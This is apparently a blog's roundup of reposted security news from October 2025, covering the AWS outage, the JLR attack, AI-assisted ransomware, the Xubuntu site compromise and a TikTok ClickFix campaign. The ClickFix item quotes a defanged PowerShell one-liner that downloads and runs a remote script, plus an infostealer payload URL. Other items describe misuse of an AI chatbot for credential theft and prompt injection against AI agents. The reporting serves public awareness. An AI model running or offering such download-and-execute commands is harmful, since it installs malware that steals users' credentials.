A sprawling Amazon Web Services cloud outage that began early Monday morning illustrated the fragile interdependencies of the internet as major communication, financial, health care, education, and government platforms around the world suffered disruptions. As the day wore on, AWS diagnosed and began working to correct the issue, which stemmed from the company's critical US-EAST-1 region based in northern Virginia. But the cascade of impacts took time to fully resolve.

Researchers reflecting on the incident particularly highlighted the length of the outage, which started around 3 am ET on Monday, October 20. AWS said in status updates that by 6:01 pm ET on Monday “all AWS services returned to normal operations.” The outage directly stemmed from Amazon's DynamoDB database application programming interfaces and, according to the company, “impacted” 141 other AWS services. Multiple network engineers and infrastructure specialists emphasized to WIRED that errors are understandable and inevitable for so-called “hyperscalers” like AWS, Microsoft Azure, and Google Cloud Platform, given their complexity and sheer size. But they noted, too, that this reality shouldn't simply absolve cloud providers when they have prolonged downtime.

“The word hindsight is key. It's easy to find out what went wrong after the fact, but the overall reliability of AWS shows how difficult it is to prevent every failure,” says Ira Winkler, chief information security officer of the reliability and cybersecurity firm CYE. “Ideally, this will be a lesson learned, and Amazon will implement more redundancies that would prevent a disaster like this from happening in the future—or at least prevent them staying down as long as they did.”

AWS did not respond to questions from WIRED about the long tail of the recovery for customers. An AWS spokesperson says the company plans to publish one of its “post-event summaries” about the incident.

“I don't think this was just a ‘stuff happens’ outage. I would have expected a full remediation much faster,” says Jake Williams, vice president of research and development at Hunter Strategy. “To give them their due, cascading failures aren't something that they get a lot of experience working with because they don't have outages very often. So that's to their credit. But it's really easy to get into the mindset of giving these companies a pass, and we shouldn't forget that they create this situation by actively trying to attract ever more customers to their infrastructure. Clients don't control whether they are overextending themselves or what they may have going on financially.”

The incident was caused by a familiar culprit in web outages—“domain name system” resolution issues. DNS is essentially the internet's phonebook mechanism to direct web browsers to the right servers. As a result, DNS issues are a common source of outages, because they can cause requests to fail and keep content from loading.

“Cloud computing is a marvel, but the heart of it is a never-ending list of complex services and dependencies that are always one configuration away from failure," says Mark St. John, chief operating officer and cofounder of the systems security startup Neon Cyber.

Speaking generally about hyperscalers, St. John echoed Williams' point that in exchange for the mature architecture and secure baseline of cloud platforms, customers cede control of their underlying digital infrastructure and the extent to which their cloud provider is or isn't investing in resilience and contingency planning at a given time. “At a certain scale, operational validation for service providers can't be a casualty of cost-cutting,” St. John says.

Thinking specifically about Monday's outage, one senior network architect at a major tech company, who requested anonymity because they are not authorized to speak to the press, also emphasized that the time it took for AWS to diagnose and remediate the issues was notable.

“It’s extraordinary that they don’t have more failures,” the source said, “but in this case it was weird that what was basically a core service—DynamoDB and the DNS around that—took so long to detect and get to a root cause.”

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Thursday 23 October 2025 at 3:36 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533

RIP Matrix

The cyberattack on Jaguar Land Rover is estimated to have cost the UK at least £1.9 billion in what is likely to be “the most economically damaging cyber event” for the country.

The month-long shutdown of internal systems and production at JLR affected over 5,000 British organisations, according to an analysis by Cyber Monitoring Centre, a non-profit organization that ranks the severity of cyber events in the UK.

“This incident looks to have been by some distance, the single most financially damaging cyber event ever to hit the UK,” said Ciaran Martin, former head of the National Cyber Security Centre and chair of CMC’s technical committee.

JLR, which is owned by India’s Tata Motors, only recently restarted partial production of its vehicles in the UK following a shutdown since the August 31 attack.

The severe impact on JLR’s suppliers prompted the UK government to intervene with a £1.5 billion loan guarantee to make it easier for the carmaker to access credit.

CMC mainly attributes the financial cost to the fall in vehicle sales and lower profits caused by the production halt, the costs to address the incident, and the impact on its supply chain and other local businesses.

Its estimate is also based on the assumption that JLR would not be able to fully restore its production until January and that the attackers did not infiltrate its so-called “operational technology,” which if they had, would take longer to resolve.

There has been a spate of ransomware attacks on UK companies and organizations in recent years, including retailers Marks and Spencer and Co-op, in addition to NHS England.

The CMC estimated in June that the financial impact of the attacks on the two retailers was between £270 million and £440 million.

The investigation into the JLR attack is being led by the National Crime Agency but few details have emerged on who was behind the incident. The CMC estimate did not include assumptions about whether JLR had paid a ransom or not.

Martin said companies tended to focus their resources on protecting themselves against data breaches since they have a legal obligation to protect customer data.

But cases like JLR underscore the increasing risks of attackers not just stealing data but destroying critical networks supporting a company’s operations, and the high costs associated with such attacks.

While state actors have not been behind recent attacks on M&S and other retailers, Martin warned that there was an increasing “geopolitical vulnerability” and risk that hostile nation states could attack UK businesses for non-financial reasons.

“It is now clear not just that criminal disruptive attacks are the worst problem in cybersecurity right now, but they’re a playbook to hostile nation states on how to attack us,” Martin said at a separate speech in London on Wednesday. “So cybersecurity has become economic security. And economic security is national security.”

Last week, the UK National Cyber Security Centre also warned that state actors continued to pose “a significant threat” to Britain and global cyber security, citing the risks posed by China, Russia, and others.

According to an annual review by NCSC, the UK had suffered 204 “nationally significant [cyber] incidents” in the 12 months to August 2025, compared with 89 in the same period a year earlier.

The term is used to describe the three most serious types of incidents as defined by UK law enforcement.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Thursday 23 October 2025 at 3:35 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533

RIP Matrix

The 2025 Global Threat Intelligence Report from Mimecast reveals key trends, including the rise of smarter, AI-powered phishing and social engineering cyberattacks, and threat groups increasingly using trusted services to evade detection and reach targets. Mimecast’s analysis finds that phishing accounts for 77 percent of all attacks up from 60 percent in 2024 with attackers likely leveraging more AI tools.

“We’re seeing a clear evolution in attacker behavior in 2025, headlined by an exponential rise in AI-driven threats,” says Ranjan Singh, Mimecast chief product and technology officer. “Financial platforms, regulatory agencies, and city governments have all been targeted by profit-driven ransomware groups and highly organized, state-sponsored adversaries. Threat actors are doubling down on human-focused attacks and exploiting trusted business services as their primary means of intrusion, making employee awareness and resilient systems more essential than ever.”

Generative AI has given threat actors more power to create the perfect lure, impersonating vendors, partners, and employees. They are now able to craft convincing email chains, synthetic voices, and audio messages that can bypass detection tools.

Mimecast research shows a significant increase in social engineering attacks, including schemes like ClickFix, AI-augmented phishing, and business email compromise (BEC). These attacks are becoming increasingly sophisticated, with attackers leveraging automated conversation chains to create the illusion of legitimate communication in phishing emails.

Trusted business tools are being exploited too, platforms like Adobe Pay, DocuSign, and Salesforce are being used within attack chains, with virtual meeting room and hosting service DocSend becoming the most abused service in 2025.

Certain industries are in the firing lone too with professional education, IT software, telecommunications, real estate, and legal organizations seeing a higher volume of impersonation attacks. These sectors often have direct access to high-value targets, handle sensitive financial transactions and manage confidential client information, making them attractive to attackers.

“Cyber defense can no longer be treated solely as a technology issue,” says Mimecast chief information security officer, Leslie Nielsen. “It’s equally about people and organizational resilience. Since last year, cybercriminals have significantly increased their use of trusted services to bypass technical defenses that might otherwise block attacks. Countering these threats requires organizations to adapt by preparing employees to recognize suspicious activity and leveraging tools like AI internally to enhance both business workflows and security operations. As threat actors continue to target the human layer through deception, trust exploitation, and multichannel coordination, building awareness and resilient response capabilities becomes critical.”

The full report is available from the Mimecast site.

Source

From as early as Windows Vista, Microsoft's operating systems started shipping with an important security feature called BitLocker. It's a feature designed to protect sensitive data and information from unauthorized access through encryption.

BitLocker is enabled by default in Windows 11 when you first sign in or set up a device with a Microsoft account. Last year, the company made this change while releasing Windows 11, version 24H2.

The Windows update also made BitLocker accessible to a broad range of devices because it's less demanding in terms of hardware requirements, including Windows 11 Pro and Home. Users no longer need Hardware Security Test Interface (HSTI) or Modern Standby to access the feature.

But if the past few months are anything to go by, storage and backing up your data on the cloud are very sensitive topics. Remember when a OneDrive user was locked out of "30 years' worth of photos and work" without any support? As it happens, a user recently shared an unfortunate incident where they ended up losing access to 3TB worth of games and backups.

The user indicated that they'd noticed that their PC was a tad laggy, prompting them to reinstall Windows 11. They further indicated that they'd never enabled BitLocker before since they didn't necessarily need it. However, when they reinstalled Windows 11, two out of the six drives in the gaming PC (built on an AORUS B550 Elite AX v2 motherboard, a Ryzen 7 5700X3D CPU, 64GB of RAM, and a 12GB GeForce RTX 3060 GPU) were encrypted.

"Can't access 3TB of data! It's asking for a key but I never set one up," Toast Soup added on Reddit. "Google only gives results if your boot drive is Bitlocked, not a 😧 or E: storage drive. I ran some data recovery software but it shows zero files to recover."

"Help me Reddit. You're my only hope...," the user indicated. Perhaps more concerningly, Toast Soup admitted that they dug themselves deeper into the rabbit hole, "using every damn data retrieval program" in a bid to regain access to the encrypted drives with the games and backups. "I went to a lot of sketchy sites and downloaded torrents that I'm sure filled my PC with more spyware and viruses than I can count."

On Monday afternoon, Amazon confirmed that an outage affecting Amazon Web Services’ cloud hosting, which had impacted millions across the Internet, had been resolved.

Considered the worst outage since last year’s CrowdStrike chaos, Amazon’s outage caused “global turmoil,” Reuters reported. AWS is the world’s largest cloud provider and, therefore, the “backbone of much of the Internet,” ZDNet noted. Ultimately, more than 28 AWS services were disrupted, causing perhaps billions in damages, one analyst estimated for CNN.

Popular apps like Snapchat, Signal, and Reddit went dark. Flights got delayed. Banks and financial services went down. Massive games like Fortnite could not be accessed. Some of Amazon’s own services were hit, too, including its e-commerce platform, Alexa, and Prime Video. Ultimately, millions of businesses simply stopped operating, unable to log employees into their systems or accept payments for their goods.

“The incident highlights the complexity and fragility of the Internet, as well as how much every aspect of our work depends on the Internet to work,” Mehdi Daoudi, the CEO of an Internet performance monitoring firm called Catchpoint, told CNN. “The financial impact of this outage will easily reach into the hundreds of billions due to loss in productivity for millions of workers that cannot do their job, plus business operations that are stopped or delayed—from airlines to factories.”

Amazon’s problems originated at a US site that is its “oldest and largest for web services” and often “the default region for many AWS services,” Reuters noted. The same site has experienced two outages before in 2020 and 2021, but while the tech giant had confirmed that those prior issues had been “fully mitigated,” apparently the fixes did not ensure stability into 2025.

ZDNet noted that Amazon’s first sign of the outage was “increased error rates and latency across numerous key services” tied to its cloud database technology. Although “engineers later identified a Domain Name System (DNS) resolution problem” as the root of these issues and quickly fixed it, “other AWS services began to fail in its wake, leaving the platform still impaired” as more than two dozen AWS services shut down.

At the peak of the outage on Monday, Down Detector tracked more than 8 million reports globally from users panicked by the outage, ZDNet reported.

Ken Birman, a computer science professor at Cornell University, told Reuters that “software developers need to build better fault tolerance,” suggesting Amazon could have done more to prevent the latest outage.

“When people cut costs and cut corners to try to get an application up, and then forget that they skipped that last step and didn’t really protect against an outage, those companies are the ones who really ought to be scrutinized later,” Birman told Reuters.

For Amazon, the backlash risks hitting its bottom line hard if too many customers pivot to other cloud technology providers. Financial services firms, which may be the most risk-averse of Amazon’s customers, think the solution might be a “multi-cloud” strategy, “distributing critical workloads across two or more major providers, such as AWS, Microsoft Azure, and Google Cloud,” Forbes reported.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Wednesday 22 October 2025 at 4:37 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533

RIP Matrix

This known issue impacts all Windows 10, Windows 11, and Windows Server releases, including the latest versions designated for broad deployment.

Affected users may observe various symptoms, from the inability to sign documents and failures in applications that use certificate-based authentication to smart cards not being recognized as CSP providers (Cryptographic Service Provider) in 32-bit apps.

They can also see "invalid provider type specified" and "CryptAcquireCertificatePrivateKey error." error messages.

"This issue is linked to a recent Windows security improvement to use KSP (Key Storage Provider) instead of CSP (Cryptographic Service Provider) for RSA-based smart card certificates to improve cryptography," Microsoft said.

"You can detect if your smart card will be affected by this issue if you observe the presence of Event ID 624 in the System event logs for the Smart Card Service prior to installing the October 2025 Windows security update."

As the company explained, this known issues occurs because this month's security updates are automatically enabling by default a security fix designed to address a security feature bypass vulnerability (CVE-2024-30098) in the Windows Cryptographic Services, built-in Windows service that handles security-related and cryptographic operations.

This fix is enabled by setting the DisableCapiOverrideForRSA registry key value to 1 to isolate cryptographic operations from the Smart Card implementation and block attackers from creating a SHA1 hash collision to bypass digital signatures on vulnerable systems.

Those who are experiencing authentication problems can manually resolve it by disabling the DisableCapiOverrideForRSA registry key using the following procedure:

1. Open Registry Editor. Press Win + R, type regedit, and press Enter. If prompted by User Account Control, click Yes.
2. Navigate to the subkey. Go to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Calais.
3. Edit the key and set the value. Inside Calais, check if key DisableCapiOverrideForRSA exists. Double-click DisableCapiOverrideForRSA. In Value date, enter: 0.
4. Close and restart. Close Registry Editor. Restart the computer for changes to take effect.

However, it's important to note that you should first back up the registry before editing the Windows registry because any errors could lead to system issues.

While this will mitigate the issue, the DisableCapiOverrideForRSA registry key will be removed in April 2026, and Microsoft advised affected users to work with their application vendors to resolve the underlying problem.

Redmond fixed a similar issue that caused smartcard authentication failures on Windows 10 systems when connecting via Remote Desktop.

On Thursday, Microsoft fixed another known issue breaking IIS websites and HTTP/2 localhost (127.0.0.1) connections after installing recent Windows security updates.

The same day, the company also removed two compatibility holds preventing users from upgrading their systems to Windows 11 24H2 via Windows Update.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Tuesday 21 October 2025 at 3:57 am AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533

RIP Matrix

The 131 spamware extensions share the same codebase, design patterns, and infrastructure, according to supply chain security company Socket. The browser add-ons collectively have about 20,905 active users.

"They are not classic malware, but they function as high-risk spam automation that abuses platform rules," security researcher Kirill Boychenko said. "The code injects directly into the WhatsApp Web page, running alongside WhatsApp's own scripts, automates bulk outreach and scheduling in ways that aim to bypass WhatsApp's anti-spam enforcement."

The end goal of the campaign is to blast outbound messaging via WhatsApp in a manner that bypasses the messaging platform's rate limits and anti-spam controls.

The activity is assessed to have been ongoing for at least nine months, with new uploads and version updates to the extensions observed as recently as October 17, 2025. Some of the identified extensions are listed below -

•     YouSeller (10,000 users)
•     performancemais (239 users)
•     Botflow (38 users)
•     ZapVende (32 users)

The extensions have been found to embrace different names and logos, but, behind the scenes, the vast majority of them have been published by "WL Extensão" and its variant "WLExtensao." It's believed that the differences in branding are the result of a franchise model that allows the operation's affiliates to flood the Chrome Web Store with various clones of the original extension offered by a company named DBX Tecnologia.

These add-ons also claim to masquerade as customer relationship management (CRM) tools for WhatsApp, allowing users to maximize their sales through the web version of the application.

"Turn your WhatsApp into a powerful sales and contact management tool. With Zap Vende, you'll have an intuitive CRM, message automation, bulk messaging, visual sales funnel, and much more," reads the description of ZapVende on the Chrome Web Store. "Organize your customer service, track leads, and schedule messages in a practical and efficient way."

DBX Tecnologia, per Socket, advertises a reseller white-label program to allow prospective partners to rebrand and sell its WhatsApp Web extension under their own brand, promising recurring revenue in the range of R$30,000 to R$84,000 by investing R$12,000.

It's worth noting that the practice is in violation of Google's Chrome Web Store Spam and Abuse policy, which bans developers and their affiliates from submitting multiple extensions that provide duplicate functionality on the platform. DBX Tecnologia has also been found to have put out YouTube videos about bypassing WhatsApp's anti-spam algorithms when using the extensions.

"The cluster consists of near-identical copies spread across publisher accounts, is marketed for bulk unsolicited outreach, and automates message sending inside web.whatsapp.com without user confirmation," Boychenko noted. "The goal is to keep bulk campaigns running while evading anti-spam systems."

The disclosure comes as Trend Micro, Sophos, and Kaspersky shed light on a large-scale campaign that's targeting Brazilian users with a WhatsApp worm dubbed SORVEPOTEL that's used to distribute a banking trojan codenamed Maverick.

Source

Recent reports claim to showcase AI-powered ransomware. But how big is the risk to businesses?

Beyond ransomware-as-a-a service, AI is making ransomware more available to cybercriminals with limited abilities. Anthropic reported that an adversary used the Claude chatbot for recon, code generation and credential theft against 17 organisations, including healthcare providers, government agencies and a defence contractor.

Meanwhile, cybersecurity firm ESET demonstrated a proof of concept showing what researchers call the first AI-powered ransomware.

Ransomware is bad enough on its own, with the malware now present in 44% all breaches, according to Verizon’s 2025 Data Breach Investigations report. So, how will AI technology affect the ransomware market? And are researchers’ predictions an indicator of what’s to come?

AI-Powered Ransomware

The technology is supercharging attacker capabilities, but not all cybersecurity experts are convinced of the risk from AI-powered ransomware. Rik Ferguson, VP of security intelligence at Forescout and cybersecurity industry veteran says the “loud AI-powered ransomware” headlines are “mostly hyperbole”.

Recent reports highlighting instances of AI-powered ransomware involved malware samples embedded with AI prompts capable of executing script commands for file discovery and encryption. However, they were not examples of real-world attacks, Robert McArdle, director of forward threat research at Trend Micro points out.

Instead, they originated from academic research and were uploaded to public repositories such as VirusTotal, where they were identified, he says.

And in fact, rather than offering an easy means to attack, the idea of AI-integrated ransomware actually presents several drawbacks for criminals using it, says McArdle. “Such malware is typically easier to detect and often relies on connections to cloud-based AI services, introducing additional risks. Threat actors must then evade detection from traditional security vendors, as well as from the security teams of large language model providers.”

The real criminal operational improvements today are in the back-end, says Ferguson says. “This is where AI sharpens target selection, personalises phishing at scale and dynamically tunes campaigns to raise conversion rates without raising flags.”

Taking this into account, Anthropic’s latest misuse report is the better compass of how adversaries are using AI in ransomware attacks, says Ferguson. “One adversary used Claude to automate reconnaissance, assist credential theft, triage targets and draft ransom notes, leaning on leak-based extortion rather than encryption. That’s the operational reality to plan for.”

The Real Risk of AI 

As the area develops, experts agree that AI will play a role in a number of areas of the ransomware market. One is in the post-exfiltration phase of the ransomware kill chain, specifically in the monetisation of stolen data, says McArdle.

He describes a development in late August on the RAMP4U forum, where the Dragonforce ransomware group announced a new data analysis service. “This leverages AI to process stolen data and produce tailored outputs designed to increase pressure on victims.”

As large language models become more capable and accessible, attackers will move beyond using AI as a tool and start embedding it directly into their operations, Dan Jones, senior security advisor at Tanium tells SC Media UK.

This can range from adaptive reconnaissance to malware that learns from its environment, Jones says. He thinks ransomware strains will evolve to “negotiate, pivot and persist without the hacker needing to intervene”.

Looking ahead, AI-powered ransomware is likely to become more “autonomous adaptive, and stealthy”, agrees Steve Sandford, partner, digital forensics and incident response at Cyxcel. “Future variants may use reinforcement learning to optimise attack paths or integrate deepfake technology to impersonate executives and manipulate victims.”

Magic Malware

The addition of AI to ransomware operations means firms need to be on their guard. But the threat is not that large – at least yet.

Over the next year, expect AI to keep supercharging operations, not to create magic malware, says Ferguson. “Think dynamic victim profiling, adaptive phishing, faster privilege escalation, automated leak-site curation and tailored pressure campaigns.”

On the code side, he suggests more local models could be used to dodge provider guardrails. “But the measurable improvement for criminals will remain in scale and speed rather than novel exploits or attack chains.”

While generative AI is driving industry discourse, the most transformative impact is likely to come from agentic AI, says McArdle. “This does not rely on a single, all-powerful system, but on a network of specialised agents, each designed to perform a specific task. These agents are orchestrated by a central AI coordinator or digital assistant, which manages workflows, retains memory of past actions, and continuously learns to optimise performance. “

He thinks the adoption of agentic AI has the potential to move beyond the model of “cybercrime-as-a-service” to what he labels “cybercrime-as-a-servant”. This would enable criminals to “delegate complex operations to AI systems with minimal oversight”, he says.

For now, there are some simple steps firms can take to mitigate the threat. The right response isn’t to “panic” or “chase the next shiny security tool”, says Adam Seamons, head of information security at GRC International Group. “It’s about doing the basics properly, using strong identity controls, tested backups, behaviour-based detection, and people who trust their instincts when something seems wrong. In short, assume the attackers are using automation, and make sure you’re keeping up.”

And while the emergence of AI-powered ransomware might introduce new dimensions to cyber threats, it remains, at its core, a form of ransomware, McArdle points out. Therefore, he says, “established best practices for defending against attacks continue to be applicable”.

Source

That’s important because it means that your Windows 10 computer will gradually become less secure. 

“Microsoft does not warn that it’s the last update, but it does show a small nudge to sign up for Extended Security Updates,” Windows Latest reports.

So, what should you do to keep your PC secure?

First up, if you think you would like Windows 11 after all, it’s free to upgrade to it — and there are plenty of nudges from Microsoft to do that.

But what if your PC isn’t capable of running Windows 11? This is something you can check. Microsoft explained what to do in a recent support document: “To check if your PC is eligible for the free upgrade go to Start > Settings > Update & Security > Windows Update and select Check for updates,” it said.

But what if you like Windows 10, thank you very much, and don’t want to move to the next OS? There are hundreds of millions of users who haven’t chosen to move to Windows 11, by the way.

In that case, you have the ESU option. This will provide security updates for almost a year, until Oct. 14, 2026. Microsoft really does want you on Windows 11 after that, but you have 12 months grace to, as the company puts it, prepare for the transition to Windows 11.

To sign up to ESU costs $30, but you can choose to redeem 1,000 Microsoft Rewards points instead of paying cash. Even better, the $30 fee is waived, making it a free option, if you agree to sync your PC settings.

To sign up for this, go to Settings, then choose Update & Security and Windows Update. If your device meets the prerequisites, click on the link marked Enroll now and sign in with your Microsoft account.

Source

For those people not able to upgrade to Windows 11, due to insufficient hardware, a popular choice has been to switch to Linux, and hackers know this. Well, over the weekend, the website of Xubuntu, an Ubuntu spin, was compromised to serve Windows malware.

According to OMG! Ubuntu, the malware was being served in the ironically-named file xubuntu-safe-download.zip, which was being downloaded by users who tried to download the official .torrent file. If you didn’t download the torrent, you should be fine.

Inside the zip file was a Windows .exe runtime which contained the malware and a terms of service text file. While this wouldn’t have tricked an experienced user, who knows they’re looking for an .ISO or .IMG file, a Linux novice who has never left Windows might not realize this and click the .exe, getting their machine infected.

The malware itself was designed to intercept links for cryptocurrency accounts copied to the clipboard, probably in an attempt to clear users out of their savings. As cryptocurrency is largely unregulated, it’s much harder to get your assets back when compared to money being taken from your bank account.

Once the team learned about what happened, they took down the affected download page immediately so others wouldn’t be able to infect their PC. The project said that it is expediting static site development to replace the aging WordPress instance.

While this sucks for the credibility of the Xubuntu project, users should be fully aware the compromise was very limited. No other flavours of Ubuntu, the Ubuntu infrastructure, or direct Xubuntu ISO downloads were compromised. Also, if you are running Xubuntu, there is no need to worry as this attack doesn’t affect you.

While the Xubuntu team works on the new website, you’ll need to head here https://cdimage.ubuntu.com/xubuntu/releases/ to download Xubuntu, which is safe to do.

Source

A disruption involving Amazon Web Services, the cloud service provider that powers much of the internet, took many websites and apps offline for over two hours on Monday, in the latest outage that showed the fragility of the global technology infrastructure.

The disruption affected websites and apps for some major banks, gaming sites and entertainment services starting shortly after 3 a.m. Eastern. Amazon said in an update at 5:27 a.m. that most websites and apps relying on its services were working normally again, and that it continued “to work through a backlog of queued requests.”

Major services were affected, including WhatsApp, the British government’s website and government tax services, the payment app Venmo, the cryptocurrency platform Coinbase and games at The New York Times. Dozens of other companies and retailers — including Amazon, Venmo, Hulu, Snapchat, Ring doorbells and McDonald’s — also experienced service interruptions.

It was not immediately clear what led to the outage, and there were no indications that it had been caused by a cyberattack.

Experts said that the disruption showed again how the internet’s reliance on a few major technology providers — including Amazon, Microsoft and Google — can affect millions of users when one service breaks down. Last year, a much wider, daylong internet outage was caused by a faulty update sent out by a little known cybersecurity company called CrowdStrike.

Amazon Web Services counts thousands of clients who rely on it for complex, demanding, data-intensive operations including streaming video, running web applications and storing huge amounts of digital information. Amazon’s cloud-computing division has set up infrastructure all around the world, allowing companies to make their products accessible to customers across the globe. By renting the service, clients can scale up or down without having to invest in otherwise costly hardware.

In its initial statement on the outage, Amazon’s said early Monday that 28 of its services, including those in the “US-EAST-1” region, were having issues and that its engineers had been working on limiting the effects and identifying the cause.

Rob Jardin, the chief digital officer at NymVPN, a virtual private network service, said that early indications were that the outage may have been caused by a technical fault affecting one of Amazon’s main data centers.

“Outages of this scale expose our overreliance on centralized infrastructures,” he said in a statement. “The internet was originally designed to be decentralized and resilient, yet today so much of our online ecosystem is concentrated in a small number of cloud regions.”

Some media advocates said that the outage, which caused disruptions to secure communications apps such as Signal and other digital tools, showed how the internet’s reliance on a few major technology companies posed a risk to free speech.

“When a single provider goes dark, critical services go offline with it,” Corinne Cath-Speth, head of digital for Article 19, a free speech advocacy group, said in a statement. She added that there was an urgent need for diversification in cloud computing. “The infrastructure underpinning democratic discourse, independent journalism and secure communications cannot be dependent on a handful of companies.”

Still, Amazon’s share price barely moved in premarket trading, suggesting that investors were not too bothered about the outage. In the first half of the year, Amazon Web Services accounted for nearly 20 percent of Amazon’s sales, but about 60 percent of its operating profit.

Source

Also:  Live: Amazon services showing 'signs of recovery' after Snapchat and banks among sites hit by major outage

          AWS outage crashes Amazon, PrimeVideo, Fortnite, Perplexity and more

ISC Handler Xavier Mertens spotted the ongoing campaign, which is largely the same as the one observed by Trend Micro in May

The TikTok videos seen by BleepingComputer pretend to offer instructions on how to activate legitimate products like Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro, and Discord Nitro, as well as made-up services such as Netflix and Spotify Premium.

The videos are performing a ClickFix attack, which is a social engineering technique that provides what appears to be legitimate "fixes" or instructions that trick users into executing malicious PowerShell commands or other scripts that infect their computers with malware.

Each video displays a short one-line command and tells viewers to run it as an administrator in PowerShell:

iex (irm slmgr[.]win/photoshop)

It should be noted that the program name in the URL is different depending on the program that is being impersonated. For example, in the fake Windows activation videos, instead of the URL containing photoshop, it would include windows.

In this campaign, when the command is executed, PowerShell connects to the remote site slmgr[.]win to retrieve and execute another PowerShell script.

This script downloads two executables from Cloudflare pages, with the first executable downloaded from https://file-epq[.]pages[.]dev/updater.exe [VirusTotal]. This executable is a variant of the Aura Stealer info-stealing malware.

Aura Stealer collects saved credentials from browsers, authentication cookies, cryptocurrency wallets, and credentials from other applications and uploads them to the attackers, giving them access to your accounts.

Mertens says that an additional payload will be downloaded, named source.exe [VirusTotal], which is used to self-compile code using .NET's built-in Visual C# Compiler (csc.exe). This code is then injected and launched in memory.

The purpose of the additional payload remains unclear.

Users who perform these steps should consider all of their credentials compromised and immediately reset their passwords on all sites they visit.

ClickFix attacks have become very popular over the past year, used to distribute various malware strains in ransomware and cryptocurrency theft campaigns.

As a general rule, users should never copy text from a website and run it in an operating system dialog box, including within the File Explorer address bar, command prompt, PowerShell prompts, macOS terminal, and Linux shells.

Source

Hope you enjoyed this news post. Feedback welcome.

Posted Monday 20 October 2025 at 12:15 pm AEST (my time).

News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533

RIP Matrix

ZDNET's key takeaways

•     Windows 11 is adding AI agents that can take actions on your behalf.
•     Copilot agents represent potential security and privacy risks.
•     Expect testing and more security controls before the feature goes public.

Every computer security decision ultimately comes down to a question of trust. Should you install this program you're about to download from an unfamiliar website? Are you certain that your email messages are going directly to their recipient without being intercepted? Is it safe to provide that merchant with your credit card details?

Soon, owners of PCs running Windows 11 will have another question to add to that list: Should you trust this Copilot agent to poke around in your files and interact with apps on your behalf?

Here's how Microsoft describes the Copilot Actions feature, which is rolling out for testing by members of the Windows Insider Program:

Copilot Actions is an AI agent that completes tasks for you by interacting with your apps and files, using vision and advanced reasoning to click, type, and scroll like a human would.

This transforms agents from passive assistants into active digital collaborators that can carry out complex tasks for you to enhance efficiency and productivity -- like updating documents, organizing files, booking tickets, or sending emails. After you've granted the agent access, when integrated with Windows, the agent can take advantage of what you already have on your PC, like your apps and data, to complete tasks for you.

These are pretty big trust decisions. Allowing an agent to interact with your personal files requires a leap of faith. So does the idea of letting an agent act on your behalf in apps -- where, presumably, you are signed in using some sort of secure credentials.

Learning from the past

The last time Microsoft rolled out a major AI feature with this level of access to your personal data, it ... didn't go well. The Windows Recall feature was slammed by security researchers, delayed for months, and finally relaunched with major privacy and security changes. Ultimately, it was nearly a year before the feature made it to public builds.

This time around, Microsoft is taking no such chances. In a pair of on-the-record briefings ahead of the public debut of the Copilot Actions feature, executives at the company went to great pains to emphasize its commitment to privacy and security controls.

For starters, the feature is rolling out as a preview, in "experimental mode," exclusively for customers who've opted into the Windows Insider Program for pre-release builds of Windows.

The feature is disabled by default and only enabled when the user flips the "Experimental agentic features" switch in Windows Settings > System > AI components > Agent tools.

Agents that integrate with Windows must be digitally signed by a trusted source, much as executable apps are. That precaution should make it possible to revoke and block malicious agents.

Agents will run under a separate standard account that is only provisioned when the user enables the feature. For now, at least, the agent account will have access to a limited set of so-called known folders in the logged-on user's profile -- including Documents, Downloads, Desktop, and Pictures. The user needs to explicitly grant permission to access files in other locations.

All of those actions will happen in a contained environment called the Agent workspace, with its own desktop and only limited access to the user's desktop. In principle, this kind of runtime isolation and granular control over permissions is similar to existing features like the Windows Sandbox.

In a blog post highlighting these security features, Dana Huang, corporate vice president, Windows Security, said, "[A]n agent will start with limited permissions and will only obtain access to resources you explicitly provide permission to, like your local files. There is a well-defined boundary for the agent's actions, and it has no ability to make changes to your device without your intervention. This access can be revoked at any time."

The security stakes for this kind of feature are high. As Huang noted, "[A]gentic AI applications introduce novel security risks, such as cross-prompt injection (XPIA), where malicious content embedded in UI elements or documents can override agent instructions, leading to unintended actions like data exfiltration or malware installation." And, of course, there's always the risk that an AI-powered agent will confidently perform the wrong action.

In an interview, Microsoft's Peter Waxman confirmed that the company's security researchers are actively "red-teaming" the Copilot Actions feature, although he declined to discuss any specific scenarios that they've tested.

Microsoft said the feature will be evolving continuously during the experimental preview period, with "more granular security and privacy controls" arriving before the features are released to the public.

Will those caveats and disclaimers be sufficient to satisfy the notoriously skeptical community of security researchers? We're about to find out.

Source

The company launched Privacy Sandbox in 2019 as a future replacement to third-party cookies. It's a set of open standards that are supposed to enable personalized ads without divulging identifying data. Over the years, Google's plans to deprecate third-party cookies got pushed back again and again due to a series of delays and regulatory hurdles. Specifically, both the UK's Competition and Markets Authority (CMA) and the US Department of Justice looked into the Privacy Sandbox out of concerns that it could harm smaller advertisers.

In 2024, Google ultimately decided not to kill third-party cookies in Chrome and instead chose to roll out "a new experience in Chrome that lets people make an informed choice that applies across their web browsing." Just this April, Google announced that it wasn't going to make any to changes to how third-party cookies work on the Chrome browser at all, and that it was going to "maintain [its] current approach to offering users third-party cookie choice in Chrome." At the time, the company said that it was going to keep the Privacy Sandbox initiative alive, but things have clearly changed since then. Chavez wrote in the latest update that Google will "continue to utilize learnings from the retired Privacy Sandbox technologies."

Source

It's 2025, and your data still isn't safe in the hands of corporations that should know a lot better than to store it in an unencrypted database. And yet, stories like these continue to send shivers down the spines of cybersecurity experts everywhere.

This time, the leak involves a company called Netcore Cloud Pvt. Ltd, based in Mumbai, India. Netcore's website states that its AI-powered "comprehensive customer experience platform" is trusted by more than 6,500 brands around the world, so it's not like it's a small company.

An unencrypted database with roughly 40 billion records — coming out to about 13TB of data — was discovered by cybersecurity researcher Jeremiah Fowler, who tipped off Website Planet with his findings.

